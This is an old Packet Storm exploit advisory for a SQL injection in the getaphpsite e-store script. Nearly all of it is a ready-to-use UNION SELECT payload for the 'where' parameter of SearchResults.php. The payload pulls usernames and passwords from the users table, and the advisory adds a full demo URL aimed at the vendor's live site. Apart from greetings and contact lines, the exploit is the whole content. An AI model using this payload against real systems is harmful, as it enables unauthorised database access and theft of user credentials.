getaphpsite e-store SQL Injection

2008-12-31T00:00:00
ID PACKETSTORM:73500
Type packetstorm
Reporter ZoRLu
Modified 2008-12-31T00:00:00

Description

                                        
                                            `[~] getaphpsite e-store (where) Remote Sql inj  
[~]  
[~] script: http://www.getaphpsite.com/6.html  
[~]  
[~]----------------------------------------------------------  
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com  
[~]  
[~] Date: 31.12.2008  
[~]  
[~] Home: www.z0rlu.blogspot.com / www.experl.com  
[~]  
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (  
[~] -----------------------------------------------------------  
  
Exploit:  
  
http://z0rlu.blogspot.com/script/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]  
  
[SQL]=  
  
ItemName+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--&ord1=ItemName&ord2=asc  
  
for demo:  
  
http://www.getaphpsite.com/demos/estore/SearchResults.php?SearchTerm=ZoRLu&where=ItemName+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--&ord1=ItemName&ord2=asc  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: yildirimordulari.org & experl.com  
[~]  
[~]----------------------------------------------------------------------`